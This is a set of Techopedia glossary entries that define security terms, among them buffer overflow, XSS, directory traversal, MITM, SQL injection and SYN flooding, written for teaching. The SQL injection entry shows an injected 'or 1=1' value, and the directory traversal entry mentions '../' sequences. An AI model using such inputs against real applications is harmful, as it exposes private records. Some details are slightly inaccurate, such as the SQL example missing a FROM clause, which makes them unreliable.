Techopedia Definitions
Block Cipher
Definition - What does Block Cipher mean? A block cipher is a symmetric cryptographic algorithm that operates on a fixed-size block of data using a shared, secret key. Plaintext is used during the encryption, and the resulting encrypted text is called a ciphertext. The same key is used for both the encryption of the plaintext and the decryption of the ciphertext. Techopedia explains Block Cipher Block cipher encrypts/decrypts its input one block at a time instead of one bit at a time using a shared, secret key. The block is fixed in size; otherwise, padding is necessary. This algorithm is symmetric. During encryption, it uses the shared key to transform its plaintext input into a cyphertext (encrypted text). During decryption, it uses the same key to transform the cyphertext back to the original plaintext. The length of the output is the same as the input. Well-known implementations of the block cipher algorithm are the Data Encryption Standard (DES), TripleDES and the Advanced Encryption standard (AES). The counterpart of block cypher is the stream cypher, which operates on its input one bit at a time, also using a shared key. An alternative to the block cipher algorithm is public-key cryptography or asymmetric cryptography. This algorithm uses a public key to encrypt plaintext and a private key to decrypt the resulting ciphertext.
Buffer Overflow
Definition - What does Buffer Overflow mean? A buffer overflow occurs when more data are written to a buffer than it can hold. The excess data is written to the adjacent memory, overwriting the contents of that location and causing unpredictable results in a program. Buffer overflows happen when there is improper validation (no bounds prior to the data being written. It is considered a bug or weakness in the software Techopedia explains Buffer Overflow Attackers can exploit a buffer overflow bug by injecting code that is specifically tailored to cause buffer overflow with the initial part of a data set, then writing the rest of the data to the memory address adjacent to the overflowing buffer. The overflow data might contain executable code that allows the attackers to run bigger and more sophisticated programs or grant themselves access to the system. Buffer overflows are one of the worst bugs that can be exploited by an attacker mostly because it is very hard to find and fix, especially if the software consists of millions of lines of code. Even the fixes for these bugs are quite complicated and error-prone. That is why it is really almost impossible to remove this type of bug entirely. Although all programmers know the potential threat of buffer overflow in their programs, there are still a lot of buffer overflow-related threats in both new and old software, regardless of the number of fixes that have already been performed.
Cross Site Scripting (XSS)
Definition - What does Cross Site Scripting (XSS) mean? Cross Site Scripting (XSS) is the process of addition of malicious code to a genuine website to gather user's information with a malicious intent. XSS attacks are possible through security vulnerabilities found in Web applications and are commonly exploited by injecting a client-side script. Although JavaScript is usually employed, some attackers also use VBScript, ActiveX or Flash. Techopedia explains Cross Site Scripting (XSS) When an XSS vulnerability is successfully exploited, the server application can be seriously exposed to major risks. For instance, users can be duped into executing malicious scripts when viewing dynamically generated pages. Another possibility involves an attacker taking over a user session before its corresponding session cookie expires. In yet another case, innocent users can be connected to a malicious server. In practically all scenarios, a victim's system is attacked by using the victim's privileges themselves. The attacks can then evolve into account hijacking, cookie theft, false advertising and modifications in the user settings of the victim's account. One way of mitigating the risks of XSS exploits is by turning off active scripting in browsers. Unfortunately, this also takes away a browser's capability to execute dynamic websites and isn't a realistic solution for most users.
DNS poisoning
Definition - What does DNS Cache Poisoning mean? DNS cache poisoning is a process by which DNS server records are illegitimately modified to replace a website address with a different address. DNS cache poisoning is used by hackers and crackers to redirect visitors of a particular website to their defined/desired website. DNS cache poisoning is also known as DNS spoofing. Techopedia explains DNS Cache Poisoning DNS cache poisoning works when the security controls of a DNS server are compromised and accessed by a hacker. The hacker replaces a website's associated DNS records with a different website, one that may contain spam, malware and/or viruses. This is done by changing the associated domain name's IP address to that of the malicious website. When the user accesses the target website from the corrupted DNS server, the hacker's website appears as opposed to the original website.
Data Loss Prevention (DLP)
Definition - What does Data Loss Prevention (DLP) mean? Data loss prevention (DLP) refers to the identification and monitoring of sensitive data to ensure that it's only accessed by authorized users and that there are safeguards against data leaks. Major insider threats as well as more stringent state privacy laws triggered the adoption of DLP in 2006. Techopedia explains Data Loss Prevention (DLP) DLP is a method of inspecting and keeping sensitive data from leaving the allowed perimeter. DLP systems are only concerned with the data passing over some kind of perimeter gateway device, such as through emails, instant messages and Web 2.0 applications. DLP has the following key features: It is configurable with automated remediation. From a financial perspective, this can significantly reduce the expense associated with remediation. Automatic remediation may differ depending on the kind of activity involved. For instance, the user may opt to encrypt, quarantine, block and/or notify the sender in the event of an email. The majority of the functions mentioned earlier could be completed using a protected email product. It is able transfer data to a safe location if the data is found to be located in an unprotected area. It removes the need for manual user lookups through the use of LDAP server/active directory. This feature is common among all DLP manufacturers.
Directory Traversal
Definition - What does Directory Traversal mean? Directory traversal is a security exploit within HTTP that enables an individual to access restricted files or directories and execute commands that are external to the Web server's root directory. It is used to access restricted content or files on a Web server. Directory traversal is also known as path traversal, . . / attack (dot dot slash attack), directory climbing and backtracking. Techopedia explains Directory Traversal Directory traversal is primarily a type of attack performed by a hacker or a cracker that induces the server to traverse to the parent directory or to expose server-specific controls. Directory traversal generally happens as a result of a lack of or insufficient validation within the code of the application hosted/executed on the Web server. In a directory traversal, the hacker/cracker typically sends in an HTTP request with a series of ../, in order to traverse or climb to a parent directory. The application/server is unable to validate the input data from the Web browser and grants access to the internal and restricted directories and the data they contain. Once the cracker/hacker gains access to the parent directory, he or she can view, edit and delete files, or even execute specific commands.
Hardening
Definition - What does Hardening mean? Hardening refers to providing various means of protection in a computer system. Protection is provided in various layers and is often referred to as defense in depth. Protecting in layers means to protect at the host level, the application level, the operating system level, the user level, the physical level and all the sublevels in between. Each level requires a unique method of security. A hardened computer system is a more secure computer system. Hardening is also known as system hardening. Techopedia explains Hardening Hardening's goal is to eliminate as many risks and threats to a computer system ADVERTISEMENT as necessary. Hardening activities for a computer system can include: Keeping security patches and hot fixes updated Monitoring security bulletins that are applicable to a system's operating system and applications Installing a firewall Closing certain ports such as server ports Not allowing file sharing among programs Installing virus and spyware protection, including an anti-adware tool so that malicious software cannot gain access to the computer on which it is installed Keeping a backup, such as a hard drive, of the computer system Disabling cookies Creating strong passwords Never opening emails or attachments from unknown senders Removing unnecessary programs and user accounts from the computer Using encryption where possible Hardening security policies, such as local policies relating to how often a password should be changed and how long and in what format a password must be in
Hot Fix
Definition - What does Hot Fix mean? A hot fix refers to the repair or upgrade of a working computer or system component, such as a running program or code. Hot fixes address critical and non-critical issues but must be applied as soon as they are released to prevent machine performance denigration due to unaddressed bugs or holes. A regular hot fix update schedule shields against OS bugs, attacks and hackers. Techopedia explains Hot Fix Microsoft releases hot fixes with regular Windows XP updates or to address specific and unexpected OS bugs. Windows' hot fixes are available for download from Microsoft's website or via the built-in Windows Update utility, which automatically downloads and installs hot fixes. Users should back up data to safeguard against potential machine inoperability prior to installing hot fixes or update
Man-in-the-middle
Definition - What does Man-in-the-Middle Attack (MITM) mean? A man-in-the-middle (MITM) attack is a form of eavesdropping where communication between two users is monitored and modified by an unauthorized party. Generally, the attacker actively eavesdrops by intercepting a public key message exchange and retransmits the message while replacing the requested key with his own. In the process, the two original parties appear to communicate normally. The message sender does not recognize that the receiver is an unknown attacker trying to access or modify the message before retransmitting to the receiver. Thus, the attacker controls the entire communication. This term is also known as a janus attack or a fire brigade attack. Techopedia explains Man-in-the-Middle Attack (MITM) MITM is named for a ball game where two people play catch while a third person in the middle attempts to intercept the ball. MITM is also known as a fire brigade attack, a term derived from the emergency process of passing water buckets to put out a fire. The MITM intercepts communications between two systems and is performed when the attacker is in control of a router along normal point of traffic. The attacker in almost all cases is located on the same broadcast domain as the victim. For instance, in an HTTP transaction, a TCP connection exists between client and server. The attacker splits the TCP connection into two connections - one between the victim and the attacker and the other between attacker and the server. On intercepting the TCP connection, the attacker acts as a proxy reading, altering and inserting data in intercepted communication. The session cookie reading the HTTP header can easily be captured by the intruder. In an HTTPS connection, two independent SSL connections are established over each TCP connection. An MITM attack takes advantage of the weakness in network communication protocol, convincing the victim to route traffic through the attacker instead of normal router and is generally referred to as ARP spoofing.
Security Patch
Definition - What does Patch mean? A patch is a software update comprised code inserted (or patched) into the code of an executable program. Typically, a patch is installed into an existing software program. Patches are often temporary fixes between full releases of a software package. Patches may do any of the following: Fix a software bug Install new drivers Address new security vulnerabilities Address software stability issues Upgrade the software Techopedia explains Patch Software patches can be free or available for sale. Some companies deliver patches to registered users only. Patches are usually available as Internet downloads. If the original source code is proprietary and not released to the general public, then patches are released as executable binary code. Patches alter the existing programming code by modifying it or replacing it completely. Patches have become extremely important as a methodology for updating programs or new system security threats which appear regularly, especially in online environments. Formerly patches were installed manually. Today automatic updates are very popular and are available as self-installing packages from the software vendors support pages at their website. Although patches can vary in size from several kilobytes to hundreds of megabytes, patches are usually perceived as being rather small. Common to Microsoft Windows operating system ADVERTISEMENT large patches are generally named service packs, and can be over 100Mb.
Replay Attack
Definition - What does Replay Attack mean? A replay attack is a category of network attack in which an attacker detects a data transmission and fraudulently has it delayed or repeated. The delay or repeat of the data transmission is carried out by the sender or by the malicious entity, who intercepts the data and retransmits it. In other words, a replay attack is an attack on the security protocol using replays of data transmission from a different sender into the intended into receiving system, thereby fooling the participants into believing they have successfully completed the data transmission. Replay attacks help attackers to gain access to a network, gain information which would not have been easily accessible or complete a duplicate transaction. A replay attack is also known as a playback attack. Techopedia explains Replay Attack Unless mitigated, networks and computers subject to replay attack would see the attack process as legitimate messages. One example of a replay attack is to replay the message sent to a network by an attacker, which was earlier sent by an authorized user. Although the messages might be encrypted and the attacker may not get the actual keys, retransmission of valid data or logon messages could help them gain sufficient access to the network. A replay attack can gain access to the resources by replaying an authentication message and can confuse the destination host. One of the best techniques to avert replay attacks is by using strong digital signatures with timestamps. Another technique that could be used to avoid a replay attack is by creating random session keys which are time bound and process bound. A one-time password for each request also helps in preventing replay attacks and is frequently used in banking operations. Other techniques used against replay attacks include sequencing of messages and non-acceptance of duplicated messages.
SQL Injection
Definition - What does SQL Injection mean? An SQL injection is a computer attack in which malicious code is embedded in a poorly-designed application and then passed to the backend database. The malicious data then produces database query results or actions that should never have been executed. Techopedia explains SQL Injection Let's go through an example of a SQL injection attack: An application running a bank's operations contains menus that may be used to search for customer details using data points such as the customer's Social Security number. In the background the application calls an SQL query that runs in the database by passing the entered search values as follows: SELECT client_name, telephone, address, date_of_birth WHERE social_sec_no=23425 In this sample script, the user enters the 23425 value in the application menu window, requesting the user to enter the Social Security number. Then, using the value provided by the user, an SQL query runs in the database. A user with SQL knowledge may understand the application and, instead of entering a single value when asked for the Social Security number, enter the string "23425 or 1=1," which is passed to the database as follows: SELECT client_name, telephone, address, date_of_birth WHERE social_sec_no=23425 or 1=1 The WHERE clause is important because it introduces vulnerability. In a database, the condition 1=1 is always true, and because the query has been specified to return client Social Security number details (23425) or WHERE 1=1, the query will return all rows in the table, which was not the original intention. The above SQL injection attack example is simple, but it shows how exploiting a vulnerability to trick the application into running a backend database query or command. SQL injection attacks can be mitigated by ensuring proper application design, especially in modules that require user input to run database queries or commands. In the above example, the application could be changed so that it accepts one numeric value only.
Service Pack
Definition - What does Service Pack (SP) mean? A service pack (SP) is a patch and upgrade suite that complements an established operating system (OS) and its software programs. An SP is a small set of applications with software patches or security loops removing errors and bugs, modifying components or adding new features. Its purpose is to improve user productivity from earlier versions. Most major software vendors release application service packs annually or as required. Techopedia explains Service Pack (SP) Software applications, such as Microsoft Windows, are built on millions of source code lines and thousands of files, processes and components. Various distinct software applications provide multiple utilities and functionalities via built-in processes, which are vulnerable to errors, bugs and/or other performance-inhibiting factors. After a software application is released, SPs incorporate and maintain components, solutions and services within comprehensive sets containing updates, patches and added functionalities. SPs can be either incremental or cumulative. An incremental SP contains new updates and fixes for an application. A cumulative SP is a comprehensive collection of previous SPs.
Smurf Attack
Definition - What does Smurf Attack mean? A smurf attack is a type of denial of service attack in which a system is flooded with spoofed ping messages. This creates high computer network traffic on the victim's network, which often renders it unresponsive. Smurfing takes certain well-known facts about Internet Protocol and Internet Control Message Protocol (ICMP) into account. ICMP is used by network administrators to exchange information about network state, and can also be used to ping other nodes to determine their operational status. The smurf program sends a spoofed network packet that contains an ICMP ping. The resulting echo responses to the ping message are directed toward the victim's IP address. Large number of pings and the resulting echoes can make the network unusable for real traffic. Techopedia explains Smurf Attack The following steps lead to a smurf attack: Huge numbers of ICMP requests are sent to the victim's IP address The source destination IP address is spoofed The hosts on the victim's network respond to the ICMP requests This creates a significant amount of traffic on the victim's network, resulting in consumption of bandwidth and ultimately causing the victim's server to crash. To prevent a smurf attack, individual hosts and routers can be configured to be non-responsive to external ping requests or broadcasts. Routers can also be configured to ensure that packets directed to broadcast addresses are not forwarded.
SYN Flooding
Definition - What does Syn Flooding mean? SYN flooding is a type of network or server degradation attack in which a system sends continuous SYN requests to the target server in order to make it over consumed and unresponsive. It is used by a hacker or a person with malicious intent to restrict the target system in fulfilling user requests and / or eventually crashing it. SYN flooding can also be called a SYN attack. Techopedia explains Syn Flooding SYN flooding is primarily a type of denial of service (DoS) attack that utilizes a successive stream of SYN requests. In a typical scenario, the attacker sends SYN requests on each port of the server. The server in turn has to respond to each of the requests with an acknowledgment (ACK) packet from open ports and reset (RST) packet from all closed ports. Similarly the attacker / hacker has to respond back with an ACK packet to the server, but it doesn't and keeps the connection open, along with sending further SYN requests / packets to the server. Therefore, due to the large and ongoing number of fake or unnecessary SYN, and its responding ACK packets and their open connections, the server gets busy and is then unable to service legitimate requests
